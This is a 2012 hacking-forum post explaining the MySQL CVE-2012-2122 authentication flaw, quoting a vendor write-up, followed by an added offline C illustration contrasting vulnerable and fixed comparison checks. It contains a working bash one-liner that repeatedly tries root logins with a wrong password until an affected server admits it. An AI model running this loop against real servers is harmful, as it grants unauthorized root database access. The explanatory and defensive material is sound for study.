EvilZone

Hacking and Security => Hacking and Security => Topic started by: relax on October 06, 2012, 01:35:51 AM

Title: [exploit] MySQL CVE-2012-2122
Post by: relax on October 06, 2012, 01:35:51 AM
CVE-2012-2122: A Tragically Comedic Security Flaw in MySQL (https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql)

Quote
This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -128 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.

In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied. The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>


for windows there is a scanner (http://www.rapid7.com/free-security-software-downloads/MySQL-vulnerability-scanner-CVE-2012-2122.jsp?mkt_tok=3RkMMJWWfF9wsRonsqjKZKXonjHpfsX56uQoXqO0lMI%2F0ER3fOvrPUfGjI4AScVjI%2FqLAzICFpZo2FFKG%2FCceNc%3D) ^
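Added illustration of the narrowing bug the quoted passage describes (not code from the post, nor MySQL's or glibc's source): a constructed stand-in memcmp that returns differences outside the char range, the vulnerable check that truncates that int into a char-sized my_bool, and the fixed check beside it. HASH_SIZE, wide_memcmp, load_be32, check_scramble_vulnerable, check_scramble_fixed and the seeded LCG are all assumptions made for the demo.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#define HASH_SIZE 20     /* SHA1-sized scramble hash, as in MySQL authentication */
typedef char my_bool;    /* char-sized boolean: the narrowing conversion at the heart of the flaw */
static uint32_t load_be32(const unsigned char *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}
/* Constructed stand-in for an optimized memcmp (not glibc's code): compares 4-byte words and returns the first differing word's difference, correctly non-zero but often far outside -128..127. */
static int wide_memcmp(const unsigned char *a, const unsigned char *b, size_t n) {
    for (size_t i = 0; i + 4 <= n; i += 4) {
        uint32_t wa = load_be32(a + i), wb = load_be32(b + i);
        if (wa != wb) return (int)(wa - wb);
    }
    return 0;
}
/* Vulnerable pattern (illustrative, not MySQL's source): the int is narrowed to a char-sized my_bool, so a difference whose low byte is zero collapses to 0, which the caller reads as "match". */
static my_bool check_scramble_vulnerable(const unsigned char *expected, const unsigned char *got) {
    return wide_memcmp(expected, got, HASH_SIZE);
}
/* Fixed pattern: reduce to 0/1 before the narrowing conversion can drop the high bits. */
static my_bool check_scramble_fixed(const unsigned char *expected, const unsigned char *got) {
    return wide_memcmp(expected, got, HASH_SIZE) != 0;
}
/* Wrong hash differing only in a word's high byte (difference is a multiple of 256). Returns 1 when the chosen check (0 = vulnerable, 1 = fixed) accepts it. */
static int high_byte_mismatch_accepted(int use_fixed) {
    unsigned char expected[HASH_SIZE] = {0}, got[HASH_SIZE] = {0};
    expected[0] = 0x10; got[0] = 0x20;
    my_bool r = use_fixed ? check_scramble_fixed(expected, got) : check_scramble_vulnerable(expected, got);
    return r == 0;
}
/* Constructed, seeded LCG so the sweep below is repeatable offline. */
static uint32_t lcg_next(uint32_t *s) { *s = *s * 1103515245u + 12345u; return *s >> 16; }
/* Sweep random wrong hashes: the vulnerable check accepts about 1 in 256 (the difference's low byte happens to be zero), the fixed check none. Returns how many the chosen check accepted. */
static unsigned count_accepts(unsigned trials, int use_fixed) {
    unsigned char expected[HASH_SIZE], got[HASH_SIZE];
    uint32_t seed = 0x20122122u;
    unsigned accepted = 0;
    for (size_t i = 0; i < HASH_SIZE; i++) expected[i] = (unsigned char)lcg_next(&seed);
    for (unsigned t = 0; t < trials; t++) {
        for (size_t i = 0; i < HASH_SIZE; i++) got[i] = (unsigned char)lcg_next(&seed);
        if (memcmp(expected, got, HASH_SIZE) == 0) continue;   /* a genuine match is not the flaw */
        my_bool r = use_fixed ? check_scramble_fixed(expected, got) : check_scramble_vulnerable(expected, got);
        accepted += (r == 0);
    }
    return accepted;
}
```

The same narrowing happens silently with any comparison routine whose non-zero result is stored into a char-sized type, so the defensive fix is the `!= 0` (or a constant-time byte-wise compare) before the assignment, not a different memcmp.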